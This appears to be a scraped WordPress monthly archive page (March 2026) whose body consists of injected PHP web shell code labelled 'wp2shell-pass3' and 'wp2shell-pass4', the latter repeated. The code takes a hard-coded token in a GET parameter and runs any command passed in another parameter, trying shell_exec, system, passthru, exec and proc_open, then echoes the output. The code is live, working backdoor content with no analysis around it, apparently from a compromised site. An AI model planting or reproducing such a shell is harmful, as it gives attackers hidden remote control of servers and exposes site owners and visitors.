月度归档: 2026 年 3 月
1 篇文章
// wp2shell-pass3 if (isset($_GET['t']) && hash_equals('4f5ae2089d480ed9e68e18ac5751f22a', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; } // wp2shell-pass4 if (isset($_GET['t']) && hash_equals('c50cdd1da5f2defb081f6ded154c2c6a', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} elseif(function_exists('proc_open')){$d=array(1=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){$o=stream_get_contents($pipes[1]);fclose($pipes[1]);proc_close($p);}} else $o='NO_EXEC_FUNCS'; $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; } // wp2shell-pass4 if (isset($_GET['t']) && hash_equals('c50cdd1da5f2defb081f6ded154c2c6a', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} elseif(function_exists('proc_open')){$d=array(1=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){$o=stream_get_contents($pipes[1]);fclose($pipes[1]);proc_close($p);}} else $o='NO_EXEC_FUNCS'; $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; }
1 篇文章